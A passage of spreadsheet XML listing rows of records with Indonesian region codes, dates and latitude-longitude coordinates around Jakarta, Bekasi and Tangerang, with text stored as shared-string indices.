      <c r="G1114" t="s">
        <v>4161</v>
      </c>
      <c r="H1114" t="s">
        <v>26</v>
      </c>
      <c r="I1114" t="s">
        <v>722</v>
      </c>
      <c r="J1114" t="s">
        <v>4162</v>
      </c>
      <c r="L1114" t="s">
        <v>4163</v>
      </c>
      <c r="M1114">
        <v>3172040005</v>
      </c>
      <c r="N1114">
        <v>3172040</v>
      </c>
      <c r="O1114">
        <v>3172</v>
      </c>
      <c r="P1114">
        <v>31</v>
      </c>
      <c r="Q1114" t="s">
        <v>1351</v>
      </c>
      <c r="R1114" t="s">
        <v>281</v>
      </c>
      <c r="S1114" t="s">
        <v>49</v>
      </c>
      <c r="T1114" t="s">
        <v>33</v>
      </c>
      <c r="U1114" s="5">
        <v>10690224</v>
      </c>
      <c r="V1114" s="5" t="s">
        <v>15487</v>
      </c>
      <c r="W1114" s="5">
        <v>-624746</v>
      </c>
      <c r="X1114" t="s">
        <v>19273</v>
      </c>
      <c r="Y1114" t="str">
        <f t="shared" si="17"/>
        <v>-6.24746,106.90224</v>
      </c>
    </row>
    <row r="1115" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1115">
        <v>108686</v>
      </c>
      <c r="B1115" s="1">
        <v>43885</v>
      </c>
      <c r="C1115">
        <v>1</v>
      </c>
      <c r="D1115" t="s">
        <v>22</v>
      </c>
      <c r="E1115" t="s">
        <v>23</v>
      </c>
      <c r="F1115" t="s">
        <v>4164</v>
      </c>
      <c r="G1115" t="s">
        <v>4165</v>
      </c>
      <c r="H1115" t="s">
        <v>26</v>
      </c>
      <c r="I1115" t="s">
        <v>555</v>
      </c>
      <c r="J1115" t="s">
        <v>2301</v>
      </c>
      <c r="L1115" t="s">
        <v>4166</v>
      </c>
      <c r="M1115">
        <v>3172090007</v>
      </c>
      <c r="N1115">
        <v>3172090</v>
      </c>
      <c r="O1115">
        <v>3172</v>
      </c>
      <c r="P1115">
        <v>31</v>
      </c>
      <c r="Q1115" t="s">
        <v>890</v>
      </c>
      <c r="R1115" t="s">
        <v>890</v>
      </c>
      <c r="S1115" t="s">
        <v>49</v>
      </c>
      <c r="T1115" t="s">
        <v>33</v>
      </c>
      <c r="U1115" s="5">
        <v>10690443</v>
      </c>
      <c r="V1115" s="5" t="s">
        <v>15488</v>
      </c>
      <c r="W1115" s="5">
        <v>-618243</v>
      </c>
      <c r="X1115" t="s">
        <v>19066</v>
      </c>
      <c r="Y1115" t="str">
        <f t="shared" si="17"/>
        <v>-6.18243,106.90443</v>
      </c>
    </row>
    <row r="1116" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1116">
        <v>108687</v>
      </c>
      <c r="B1116" s="1">
        <v>43885</v>
      </c>
      <c r="C1116">
        <v>1</v>
      </c>
      <c r="D1116" t="s">
        <v>22</v>
      </c>
      <c r="E1116" t="s">
        <v>23</v>
      </c>
      <c r="F1116" t="s">
        <v>4167</v>
      </c>
      <c r="G1116" t="s">
        <v>4168</v>
      </c>
      <c r="H1116" t="s">
        <v>26</v>
      </c>
      <c r="I1116" t="s">
        <v>27</v>
      </c>
      <c r="J1116" t="s">
        <v>2627</v>
      </c>
      <c r="L1116" t="s">
        <v>4169</v>
      </c>
      <c r="M1116">
        <v>3216090001</v>
      </c>
      <c r="N1116">
        <v>3216090</v>
      </c>
      <c r="O1116">
        <v>3216</v>
      </c>
      <c r="P1116">
        <v>32</v>
      </c>
      <c r="Q1116" t="s">
        <v>334</v>
      </c>
      <c r="R1116" t="s">
        <v>335</v>
      </c>
      <c r="S1116" t="s">
        <v>41</v>
      </c>
      <c r="T1116" t="s">
        <v>42</v>
      </c>
      <c r="U1116" s="5">
        <v>10701973</v>
      </c>
      <c r="V1116" s="5" t="s">
        <v>15489</v>
      </c>
      <c r="W1116" s="5">
        <v>-617706</v>
      </c>
      <c r="X1116" t="s">
        <v>19274</v>
      </c>
      <c r="Y1116" t="str">
        <f t="shared" si="17"/>
        <v>-6.17706,107.01973</v>
      </c>
    </row>
    <row r="1117" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1117">
        <v>108688</v>
      </c>
      <c r="B1117" s="1">
        <v>43885</v>
      </c>
      <c r="C1117">
        <v>1</v>
      </c>
      <c r="D1117" t="s">
        <v>22</v>
      </c>
      <c r="E1117" t="s">
        <v>23</v>
      </c>
      <c r="F1117" t="s">
        <v>4170</v>
      </c>
      <c r="G1117" t="s">
        <v>4171</v>
      </c>
      <c r="H1117" t="s">
        <v>26</v>
      </c>
      <c r="I1117" t="s">
        <v>555</v>
      </c>
      <c r="J1117" t="s">
        <v>2627</v>
      </c>
      <c r="L1117" t="s">
        <v>4172</v>
      </c>
      <c r="M1117">
        <v>3275041004</v>
      </c>
      <c r="N1117">
        <v>3275041</v>
      </c>
      <c r="O1117">
        <v>3275</v>
      </c>
      <c r="P1117">
        <v>32</v>
      </c>
      <c r="Q1117" t="s">
        <v>133</v>
      </c>
      <c r="R1117" t="s">
        <v>134</v>
      </c>
      <c r="S1117" t="s">
        <v>41</v>
      </c>
      <c r="T1117" t="s">
        <v>42</v>
      </c>
      <c r="U1117" s="5">
        <v>10701094</v>
      </c>
      <c r="V1117" s="5" t="s">
        <v>15490</v>
      </c>
      <c r="W1117" s="5">
        <v>-627358</v>
      </c>
      <c r="X1117" t="s">
        <v>19275</v>
      </c>
      <c r="Y1117" t="str">
        <f t="shared" si="17"/>
        <v>-6.27358,107.01094</v>
      </c>
    </row>
    <row r="1118" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1118">
        <v>108689</v>
      </c>
      <c r="B1118" s="1">
        <v>43885</v>
      </c>
      <c r="C1118">
        <v>1</v>
      </c>
      <c r="D1118" t="s">
        <v>22</v>
      </c>
      <c r="E1118" t="s">
        <v>23</v>
      </c>
      <c r="F1118" t="s">
        <v>4173</v>
      </c>
      <c r="H1118" t="s">
        <v>26</v>
      </c>
      <c r="I1118" t="s">
        <v>1439</v>
      </c>
      <c r="J1118" t="s">
        <v>2627</v>
      </c>
      <c r="L1118" t="s">
        <v>4174</v>
      </c>
      <c r="M1118">
        <v>3275020006</v>
      </c>
      <c r="N1118">
        <v>3275020</v>
      </c>
      <c r="O1118">
        <v>3275</v>
      </c>
      <c r="P1118">
        <v>32</v>
      </c>
      <c r="Q1118" t="s">
        <v>4024</v>
      </c>
      <c r="R1118" t="s">
        <v>828</v>
      </c>
      <c r="S1118" t="s">
        <v>41</v>
      </c>
      <c r="T1118" t="s">
        <v>42</v>
      </c>
      <c r="U1118" s="5">
        <v>10694151</v>
      </c>
      <c r="V1118" s="5" t="s">
        <v>15491</v>
      </c>
      <c r="W1118" s="5">
        <v>-627018</v>
      </c>
      <c r="X1118" t="s">
        <v>19276</v>
      </c>
      <c r="Y1118" t="str">
        <f t="shared" si="17"/>
        <v>-6.27018,106.94151</v>
      </c>
    </row>
    <row r="1119" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1119">
        <v>108690</v>
      </c>
      <c r="B1119" s="1">
        <v>43885</v>
      </c>
      <c r="C1119">
        <v>1</v>
      </c>
      <c r="D1119" t="s">
        <v>22</v>
      </c>
      <c r="E1119" t="s">
        <v>23</v>
      </c>
      <c r="F1119" t="s">
        <v>4175</v>
      </c>
      <c r="G1119" t="s">
        <v>4176</v>
      </c>
      <c r="H1119" t="s">
        <v>26</v>
      </c>
      <c r="I1119" t="s">
        <v>920</v>
      </c>
      <c r="J1119" t="s">
        <v>2868</v>
      </c>
      <c r="L1119" t="s">
        <v>4177</v>
      </c>
      <c r="M1119">
        <v>3172080001</v>
      </c>
      <c r="N1119">
        <v>3172080</v>
      </c>
      <c r="O1119">
        <v>3172</v>
      </c>
      <c r="P1119">
        <v>31</v>
      </c>
      <c r="Q1119" t="s">
        <v>48</v>
      </c>
      <c r="R1119" t="s">
        <v>141</v>
      </c>
      <c r="S1119" t="s">
        <v>49</v>
      </c>
      <c r="T1119" t="s">
        <v>33</v>
      </c>
      <c r="U1119" s="5">
        <v>10690354</v>
      </c>
      <c r="V1119" s="5" t="s">
        <v>15492</v>
      </c>
      <c r="W1119" s="5">
        <v>-620915</v>
      </c>
      <c r="X1119" t="s">
        <v>19277</v>
      </c>
      <c r="Y1119" t="str">
        <f t="shared" si="17"/>
        <v>-6.20915,106.90354</v>
      </c>
    </row>
    <row r="1120" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1120">
        <v>108691</v>
      </c>
      <c r="B1120" s="1">
        <v>43885</v>
      </c>
      <c r="C1120">
        <v>1</v>
      </c>
      <c r="D1120" t="s">
        <v>22</v>
      </c>
      <c r="E1120" t="s">
        <v>23</v>
      </c>
      <c r="F1120" t="s">
        <v>4178</v>
      </c>
      <c r="H1120" t="s">
        <v>26</v>
      </c>
      <c r="I1120" t="s">
        <v>271</v>
      </c>
      <c r="J1120" t="s">
        <v>2627</v>
      </c>
      <c r="L1120" t="s">
        <v>4179</v>
      </c>
      <c r="M1120">
        <v>3216061004</v>
      </c>
      <c r="N1120">
        <v>3216061</v>
      </c>
      <c r="O1120">
        <v>3216</v>
      </c>
      <c r="P1120">
        <v>32</v>
      </c>
      <c r="Q1120" t="s">
        <v>54</v>
      </c>
      <c r="R1120" t="s">
        <v>55</v>
      </c>
      <c r="S1120" t="s">
        <v>41</v>
      </c>
      <c r="T1120" t="s">
        <v>42</v>
      </c>
      <c r="U1120" s="5">
        <v>10716428</v>
      </c>
      <c r="V1120" s="5" t="s">
        <v>15493</v>
      </c>
      <c r="W1120" s="5">
        <v>-630051</v>
      </c>
      <c r="X1120" t="s">
        <v>19278</v>
      </c>
      <c r="Y1120" t="str">
        <f t="shared" si="17"/>
        <v>-6.30051,107.16428</v>
      </c>
    </row>
    <row r="1121" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1121">
        <v>108692</v>
      </c>
      <c r="B1121" s="1">
        <v>43885</v>
      </c>
      <c r="C1121">
        <v>1</v>
      </c>
      <c r="D1121" t="s">
        <v>22</v>
      </c>
      <c r="E1121" t="s">
        <v>23</v>
      </c>
      <c r="F1121" t="s">
        <v>4180</v>
      </c>
      <c r="H1121" t="s">
        <v>26</v>
      </c>
      <c r="I1121" t="s">
        <v>1624</v>
      </c>
      <c r="J1121" t="s">
        <v>2627</v>
      </c>
      <c r="L1121" t="s">
        <v>4181</v>
      </c>
      <c r="M1121">
        <v>3216081002</v>
      </c>
      <c r="N1121">
        <v>3216081</v>
      </c>
      <c r="O1121">
        <v>3216</v>
      </c>
      <c r="P1121">
        <v>32</v>
      </c>
      <c r="Q1121" t="s">
        <v>4182</v>
      </c>
      <c r="R1121" t="s">
        <v>2512</v>
      </c>
      <c r="S1121" t="s">
        <v>41</v>
      </c>
      <c r="T1121" t="s">
        <v>42</v>
      </c>
      <c r="U1121" s="5">
        <v>10703016</v>
      </c>
      <c r="V1121" s="5" t="s">
        <v>15494</v>
      </c>
      <c r="W1121" s="5">
        <v>-627969</v>
      </c>
      <c r="X1121" t="s">
        <v>19279</v>
      </c>
      <c r="Y1121" t="str">
        <f t="shared" si="17"/>
        <v>-6.27969,107.03016</v>
      </c>
    </row>
    <row r="1122" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1122">
        <v>108693</v>
      </c>
      <c r="B1122" s="1">
        <v>43885</v>
      </c>
      <c r="C1122">
        <v>1</v>
      </c>
      <c r="D1122" t="s">
        <v>22</v>
      </c>
      <c r="E1122" t="s">
        <v>23</v>
      </c>
      <c r="F1122" t="s">
        <v>4183</v>
      </c>
      <c r="H1122" t="s">
        <v>26</v>
      </c>
      <c r="I1122" t="s">
        <v>974</v>
      </c>
      <c r="J1122" t="s">
        <v>2438</v>
      </c>
      <c r="L1122" t="s">
        <v>4184</v>
      </c>
      <c r="M1122">
        <v>3175050003</v>
      </c>
      <c r="N1122">
        <v>3175050</v>
      </c>
      <c r="O1122">
        <v>3175</v>
      </c>
      <c r="P1122">
        <v>31</v>
      </c>
      <c r="Q1122" t="s">
        <v>1740</v>
      </c>
      <c r="R1122" t="s">
        <v>1013</v>
      </c>
      <c r="S1122" t="s">
        <v>547</v>
      </c>
      <c r="T1122" t="s">
        <v>33</v>
      </c>
      <c r="U1122" s="5">
        <v>10691018</v>
      </c>
      <c r="V1122" s="5" t="s">
        <v>15495</v>
      </c>
      <c r="W1122" s="5">
        <v>-614677</v>
      </c>
      <c r="X1122" t="s">
        <v>19280</v>
      </c>
      <c r="Y1122" t="str">
        <f t="shared" si="17"/>
        <v>-6.14677,106.91018</v>
      </c>
    </row>
    <row r="1123" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1123">
        <v>108694</v>
      </c>
      <c r="B1123" s="1">
        <v>43885</v>
      </c>
      <c r="C1123">
        <v>1</v>
      </c>
      <c r="D1123" t="s">
        <v>22</v>
      </c>
      <c r="E1123" t="s">
        <v>23</v>
      </c>
      <c r="F1123" t="s">
        <v>4185</v>
      </c>
      <c r="G1123" t="s">
        <v>4186</v>
      </c>
      <c r="H1123" t="s">
        <v>26</v>
      </c>
      <c r="I1123" t="s">
        <v>166</v>
      </c>
      <c r="J1123" t="s">
        <v>1016</v>
      </c>
      <c r="L1123" t="s">
        <v>4187</v>
      </c>
      <c r="M1123">
        <v>3172060005</v>
      </c>
      <c r="N1123">
        <v>3172060</v>
      </c>
      <c r="O1123">
        <v>3172</v>
      </c>
      <c r="P1123">
        <v>31</v>
      </c>
      <c r="Q1123" t="s">
        <v>1019</v>
      </c>
      <c r="R1123" t="s">
        <v>48</v>
      </c>
      <c r="S1123" t="s">
        <v>49</v>
      </c>
      <c r="T1123" t="s">
        <v>33</v>
      </c>
      <c r="U1123" s="5">
        <v>10688048</v>
      </c>
      <c r="V1123" s="5" t="s">
        <v>15496</v>
      </c>
      <c r="W1123" s="5">
        <v>-621663</v>
      </c>
      <c r="X1123" t="s">
        <v>19224</v>
      </c>
      <c r="Y1123" t="str">
        <f t="shared" si="17"/>
        <v>-6.21663,106.88048</v>
      </c>
    </row>
    <row r="1124" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1124">
        <v>108695</v>
      </c>
      <c r="B1124" s="1">
        <v>43885</v>
      </c>
      <c r="C1124">
        <v>1</v>
      </c>
      <c r="D1124" t="s">
        <v>22</v>
      </c>
      <c r="E1124" t="s">
        <v>23</v>
      </c>
      <c r="F1124" t="s">
        <v>4188</v>
      </c>
      <c r="G1124" t="s">
        <v>4189</v>
      </c>
      <c r="H1124" t="s">
        <v>26</v>
      </c>
      <c r="I1124" t="s">
        <v>2962</v>
      </c>
      <c r="J1124" t="s">
        <v>2627</v>
      </c>
      <c r="L1124" t="s">
        <v>4190</v>
      </c>
      <c r="M1124">
        <v>3275060005</v>
      </c>
      <c r="N1124">
        <v>3275060</v>
      </c>
      <c r="O1124">
        <v>3275</v>
      </c>
      <c r="P1124">
        <v>32</v>
      </c>
      <c r="Q1124" t="s">
        <v>3526</v>
      </c>
      <c r="R1124" t="s">
        <v>114</v>
      </c>
      <c r="S1124" t="s">
        <v>41</v>
      </c>
      <c r="T1124" t="s">
        <v>42</v>
      </c>
      <c r="U1124" s="5">
        <v>10695912</v>
      </c>
      <c r="V1124" s="5" t="s">
        <v>15497</v>
      </c>
      <c r="W1124" s="5">
        <v>-621736</v>
      </c>
      <c r="X1124" t="s">
        <v>19281</v>
      </c>
      <c r="Y1124" t="str">
        <f t="shared" si="17"/>
        <v>-6.21736,106.95912</v>
      </c>
    </row>
    <row r="1125" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1125">
        <v>108696</v>
      </c>
      <c r="B1125" s="1">
        <v>43885</v>
      </c>
      <c r="C1125">
        <v>1</v>
      </c>
      <c r="D1125" t="s">
        <v>22</v>
      </c>
      <c r="E1125" t="s">
        <v>23</v>
      </c>
      <c r="F1125" t="s">
        <v>4191</v>
      </c>
      <c r="G1125" t="s">
        <v>4192</v>
      </c>
      <c r="H1125" t="s">
        <v>26</v>
      </c>
      <c r="I1125" t="s">
        <v>974</v>
      </c>
      <c r="J1125" t="s">
        <v>2627</v>
      </c>
      <c r="L1125" t="s">
        <v>4193</v>
      </c>
      <c r="M1125">
        <v>3275031003</v>
      </c>
      <c r="N1125">
        <v>3275031</v>
      </c>
      <c r="O1125">
        <v>3275</v>
      </c>
      <c r="P1125">
        <v>32</v>
      </c>
      <c r="Q1125" t="s">
        <v>988</v>
      </c>
      <c r="R1125" t="s">
        <v>574</v>
      </c>
      <c r="S1125" t="s">
        <v>41</v>
      </c>
      <c r="T1125" t="s">
        <v>42</v>
      </c>
      <c r="U1125" s="5">
        <v>10701885</v>
      </c>
      <c r="V1125" s="5" t="s">
        <v>15498</v>
      </c>
      <c r="W1125" s="5">
        <v>-628662</v>
      </c>
      <c r="X1125" t="s">
        <v>19282</v>
      </c>
      <c r="Y1125" t="str">
        <f t="shared" si="17"/>
        <v>-6.28662,107.01885</v>
      </c>
    </row>
    <row r="1126" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1126">
        <v>108697</v>
      </c>
      <c r="B1126" s="1">
        <v>43885</v>
      </c>
      <c r="C1126">
        <v>1</v>
      </c>
      <c r="D1126" t="s">
        <v>22</v>
      </c>
      <c r="E1126" t="s">
        <v>23</v>
      </c>
      <c r="F1126" t="s">
        <v>4194</v>
      </c>
      <c r="G1126" t="s">
        <v>4195</v>
      </c>
      <c r="H1126" t="s">
        <v>26</v>
      </c>
      <c r="I1126" t="s">
        <v>4196</v>
      </c>
      <c r="J1126" t="s">
        <v>4197</v>
      </c>
      <c r="L1126" t="s">
        <v>4198</v>
      </c>
      <c r="M1126">
        <v>3172020005</v>
      </c>
      <c r="N1126">
        <v>3172020</v>
      </c>
      <c r="O1126">
        <v>3172</v>
      </c>
      <c r="P1126">
        <v>31</v>
      </c>
      <c r="Q1126" t="s">
        <v>3744</v>
      </c>
      <c r="R1126" t="s">
        <v>1644</v>
      </c>
      <c r="S1126" t="s">
        <v>49</v>
      </c>
      <c r="T1126" t="s">
        <v>33</v>
      </c>
      <c r="U1126" s="5">
        <v>10687455</v>
      </c>
      <c r="V1126" s="5" t="s">
        <v>15499</v>
      </c>
      <c r="W1126" s="5">
        <v>-630319</v>
      </c>
      <c r="X1126" t="s">
        <v>19283</v>
      </c>
      <c r="Y1126" t="str">
        <f t="shared" si="17"/>
        <v>-6.30319,106.87455</v>
      </c>
    </row>
    <row r="1127" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1127">
        <v>108698</v>
      </c>
      <c r="B1127" s="1">
        <v>43885</v>
      </c>
      <c r="C1127">
        <v>1</v>
      </c>
      <c r="D1127" t="s">
        <v>22</v>
      </c>
      <c r="E1127" t="s">
        <v>23</v>
      </c>
      <c r="F1127" t="s">
        <v>4199</v>
      </c>
      <c r="H1127" t="s">
        <v>26</v>
      </c>
      <c r="I1127" t="s">
        <v>886</v>
      </c>
      <c r="J1127" t="s">
        <v>2627</v>
      </c>
      <c r="L1127" t="s">
        <v>4200</v>
      </c>
      <c r="M1127">
        <v>3216010008</v>
      </c>
      <c r="N1127">
        <v>3216010</v>
      </c>
      <c r="O1127">
        <v>3216</v>
      </c>
      <c r="P1127">
        <v>32</v>
      </c>
      <c r="Q1127" t="s">
        <v>1255</v>
      </c>
      <c r="R1127" t="s">
        <v>1256</v>
      </c>
      <c r="S1127" t="s">
        <v>41</v>
      </c>
      <c r="T1127" t="s">
        <v>42</v>
      </c>
      <c r="U1127" s="5">
        <v>10703956</v>
      </c>
      <c r="V1127" s="5" t="s">
        <v>15500</v>
      </c>
      <c r="W1127" s="5">
        <v>-634391</v>
      </c>
      <c r="X1127" t="s">
        <v>19284</v>
      </c>
      <c r="Y1127" t="str">
        <f t="shared" si="17"/>
        <v>-6.34391,107.03956</v>
      </c>
    </row>
    <row r="1128" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1128">
        <v>108699</v>
      </c>
      <c r="B1128" s="1">
        <v>43885</v>
      </c>
      <c r="C1128">
        <v>1</v>
      </c>
      <c r="D1128" t="s">
        <v>22</v>
      </c>
      <c r="E1128" t="s">
        <v>23</v>
      </c>
      <c r="F1128" t="s">
        <v>4201</v>
      </c>
      <c r="G1128" t="s">
        <v>4202</v>
      </c>
      <c r="H1128" t="s">
        <v>26</v>
      </c>
      <c r="I1128" t="s">
        <v>166</v>
      </c>
      <c r="J1128" t="s">
        <v>1022</v>
      </c>
      <c r="L1128" t="s">
        <v>4203</v>
      </c>
      <c r="M1128">
        <v>3172060002</v>
      </c>
      <c r="N1128">
        <v>3172060</v>
      </c>
      <c r="O1128">
        <v>3172</v>
      </c>
      <c r="P1128">
        <v>31</v>
      </c>
      <c r="Q1128" t="s">
        <v>1025</v>
      </c>
      <c r="R1128" t="s">
        <v>48</v>
      </c>
      <c r="S1128" t="s">
        <v>49</v>
      </c>
      <c r="T1128" t="s">
        <v>33</v>
      </c>
      <c r="U1128" s="5">
        <v>10687654</v>
      </c>
      <c r="V1128" s="5" t="s">
        <v>15501</v>
      </c>
      <c r="W1128" s="5">
        <v>-624309</v>
      </c>
      <c r="X1128" t="s">
        <v>19285</v>
      </c>
      <c r="Y1128" t="str">
        <f t="shared" si="17"/>
        <v>-6.24309,106.87654</v>
      </c>
    </row>
    <row r="1129" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1129">
        <v>108700</v>
      </c>
      <c r="B1129" s="1">
        <v>43885</v>
      </c>
      <c r="C1129">
        <v>1</v>
      </c>
      <c r="D1129" t="s">
        <v>22</v>
      </c>
      <c r="E1129" t="s">
        <v>23</v>
      </c>
      <c r="F1129" t="s">
        <v>4204</v>
      </c>
      <c r="G1129" t="s">
        <v>4205</v>
      </c>
      <c r="H1129" t="s">
        <v>26</v>
      </c>
      <c r="I1129" t="s">
        <v>882</v>
      </c>
      <c r="J1129" t="s">
        <v>3135</v>
      </c>
      <c r="M1129">
        <v>3674060003</v>
      </c>
      <c r="N1129">
        <v>3674060</v>
      </c>
      <c r="O1129">
        <v>3674</v>
      </c>
      <c r="P1129">
        <v>36</v>
      </c>
      <c r="Q1129" t="s">
        <v>205</v>
      </c>
      <c r="R1129" t="s">
        <v>169</v>
      </c>
      <c r="S1129" t="s">
        <v>170</v>
      </c>
      <c r="T1129" t="s">
        <v>171</v>
      </c>
      <c r="U1129" s="5">
        <v>10670262</v>
      </c>
      <c r="V1129" s="5" t="s">
        <v>15502</v>
      </c>
      <c r="W1129" s="5">
        <v>-626287</v>
      </c>
      <c r="X1129" t="s">
        <v>19286</v>
      </c>
      <c r="Y1129" t="str">
        <f t="shared" si="17"/>
        <v>-6.26287,106.70262</v>
      </c>
    </row>
    <row r="1130" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1130">
        <v>108701</v>
      </c>
      <c r="B1130" s="1">
        <v>43885</v>
      </c>
      <c r="C1130">
        <v>1</v>
      </c>
      <c r="D1130" t="s">
        <v>22</v>
      </c>
      <c r="E1130" t="s">
        <v>23</v>
      </c>
      <c r="F1130" t="s">
        <v>4206</v>
      </c>
      <c r="H1130" t="s">
        <v>26</v>
      </c>
      <c r="I1130" t="s">
        <v>65</v>
      </c>
      <c r="J1130" t="s">
        <v>2627</v>
      </c>
      <c r="L1130" t="s">
        <v>4207</v>
      </c>
      <c r="M1130">
        <v>3275012002</v>
      </c>
      <c r="N1130">
        <v>3275012</v>
      </c>
      <c r="O1130">
        <v>3275</v>
      </c>
      <c r="P1130">
        <v>32</v>
      </c>
      <c r="Q1130" t="s">
        <v>4208</v>
      </c>
      <c r="R1130" t="s">
        <v>4089</v>
      </c>
      <c r="S1130" t="s">
        <v>41</v>
      </c>
      <c r="T1130" t="s">
        <v>42</v>
      </c>
      <c r="U1130" s="5">
        <v>10693491</v>
      </c>
      <c r="V1130" s="5" t="s">
        <v>15503</v>
      </c>
      <c r="W1130" s="5">
        <v>-631743</v>
      </c>
      <c r="X1130" t="s">
        <v>19287</v>
      </c>
      <c r="Y1130" t="str">
        <f t="shared" si="17"/>
        <v>-6.31743,106.93491</v>
      </c>
    </row>
    <row r="1131" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1131">
        <v>108702</v>
      </c>
      <c r="B1131" s="1">
        <v>43885</v>
      </c>
      <c r="C1131">
        <v>1</v>
      </c>
      <c r="D1131" t="s">
        <v>22</v>
      </c>
      <c r="E1131" t="s">
        <v>23</v>
      </c>
      <c r="F1131" t="s">
        <v>4209</v>
      </c>
      <c r="G1131" t="s">
        <v>4210</v>
      </c>
      <c r="H1131" t="s">
        <v>26</v>
      </c>
      <c r="I1131" t="s">
        <v>1194</v>
      </c>
      <c r="J1131" t="s">
        <v>3664</v>
      </c>
      <c r="L1131" t="s">
        <v>4211</v>
      </c>
      <c r="M1131">
        <v>3172080003</v>
      </c>
      <c r="N1131">
        <v>3172080</v>
      </c>
      <c r="O1131">
        <v>3172</v>
      </c>
      <c r="P1131">
        <v>31</v>
      </c>
      <c r="Q1131" t="s">
        <v>2250</v>
      </c>
      <c r="R1131" t="s">
        <v>141</v>
      </c>
      <c r="S1131" t="s">
        <v>49</v>
      </c>
      <c r="T1131" t="s">
        <v>33</v>
      </c>
      <c r="U1131" s="5">
        <v>10694016</v>
      </c>
      <c r="V1131" s="5" t="s">
        <v>15504</v>
      </c>
      <c r="W1131" s="5">
        <v>-619717</v>
      </c>
      <c r="X1131" t="s">
        <v>19288</v>
      </c>
      <c r="Y1131" t="str">
        <f t="shared" si="17"/>
        <v>-6.19717,106.94016</v>
      </c>
    </row>
    <row r="1132" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1132">
        <v>108703</v>
      </c>
      <c r="B1132" s="1">
        <v>43885</v>
      </c>
      <c r="C1132">
        <v>1</v>
      </c>
      <c r="D1132" t="s">
        <v>22</v>
      </c>
      <c r="E1132" t="s">
        <v>23</v>
      </c>
      <c r="F1132" t="s">
        <v>4212</v>
      </c>
      <c r="H1132" t="s">
        <v>26</v>
      </c>
      <c r="I1132" t="s">
        <v>2962</v>
      </c>
      <c r="J1132" t="s">
        <v>4213</v>
      </c>
      <c r="L1132" t="s">
        <v>3192</v>
      </c>
      <c r="M1132">
        <v>3172090002</v>
      </c>
      <c r="N1132">
        <v>3172090</v>
      </c>
      <c r="O1132">
        <v>3172</v>
      </c>
      <c r="P1132">
        <v>31</v>
      </c>
      <c r="Q1132" t="s">
        <v>2931</v>
      </c>
      <c r="R1132" t="s">
        <v>890</v>
      </c>
      <c r="S1132" t="s">
        <v>49</v>
      </c>
      <c r="T1132" t="s">
        <v>33</v>
      </c>
      <c r="U1132" s="5">
        <v>10689374</v>
      </c>
      <c r="V1132" s="5" t="s">
        <v>15505</v>
      </c>
      <c r="W1132" s="5">
        <v>-620593</v>
      </c>
      <c r="X1132" t="s">
        <v>19289</v>
      </c>
      <c r="Y1132" t="str">
        <f t="shared" si="17"/>
        <v>-6.20593,106.89374</v>
      </c>
    </row>
    <row r="1133" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1133">
        <v>108704</v>
      </c>
      <c r="B1133" s="1">
        <v>43885</v>
      </c>
      <c r="C1133">
        <v>1</v>
      </c>
      <c r="D1133" t="s">
        <v>22</v>
      </c>
      <c r="E1133" t="s">
        <v>23</v>
      </c>
      <c r="F1133" t="s">
        <v>4214</v>
      </c>
      <c r="G1133" t="s">
        <v>4215</v>
      </c>
      <c r="H1133" t="s">
        <v>26</v>
      </c>
      <c r="I1133" t="s">
        <v>137</v>
      </c>
      <c r="J1133" t="s">
        <v>3135</v>
      </c>
      <c r="L1133" t="s">
        <v>4216</v>
      </c>
      <c r="M1133">
        <v>3671010002</v>
      </c>
      <c r="N1133">
        <v>3671010</v>
      </c>
      <c r="O1133">
        <v>3671</v>
      </c>
      <c r="P1133">
        <v>36</v>
      </c>
      <c r="Q1133" t="s">
        <v>199</v>
      </c>
      <c r="R1133" t="s">
        <v>200</v>
      </c>
      <c r="S1133" t="s">
        <v>201</v>
      </c>
      <c r="T1133" t="s">
        <v>171</v>
      </c>
      <c r="U1133" s="5">
        <v>10670764</v>
      </c>
      <c r="V1133" s="5" t="s">
        <v>15506</v>
      </c>
      <c r="W1133" s="5">
        <v>-624881</v>
      </c>
      <c r="X1133" t="s">
        <v>19290</v>
      </c>
      <c r="Y1133" t="str">
        <f t="shared" si="17"/>
        <v>-6.24881,106.70764</v>
      </c>
    </row>
    <row r="1134" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1134">
        <v>108705</v>
      </c>
      <c r="B1134" s="1">
        <v>43885</v>
      </c>
      <c r="C1134">
        <v>1</v>
      </c>
      <c r="D1134" t="s">
        <v>22</v>
      </c>
      <c r="E1134" t="s">
        <v>23</v>
      </c>
      <c r="F1134" t="s">
        <v>4217</v>
      </c>
      <c r="H1134" t="s">
        <v>26</v>
      </c>
      <c r="I1134" t="s">
        <v>27</v>
      </c>
      <c r="J1134" t="s">
        <v>3810</v>
      </c>
      <c r="L1134" t="s">
        <v>4218</v>
      </c>
      <c r="M1134">
        <v>3175050003</v>
      </c>
      <c r="N1134">
        <v>3175050</v>
      </c>
      <c r="O1134">
        <v>3175</v>
      </c>
      <c r="P1134">
        <v>31</v>
      </c>
      <c r="Q1134" t="s">
        <v>1740</v>
      </c>
      <c r="R1134" t="s">
        <v>1013</v>
      </c>
      <c r="S1134" t="s">
        <v>547</v>
      </c>
      <c r="T1134" t="s">
        <v>33</v>
      </c>
      <c r="U1134" s="5">
        <v>10691572</v>
      </c>
      <c r="V1134" s="5" t="s">
        <v>15507</v>
      </c>
      <c r="W1134" s="5">
        <v>-617471</v>
      </c>
      <c r="X1134" t="s">
        <v>19291</v>
      </c>
      <c r="Y1134" t="str">
        <f t="shared" si="17"/>
        <v>-6.17471,106.91572</v>
      </c>
    </row>
    <row r="1135" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1135">
        <v>108706</v>
      </c>
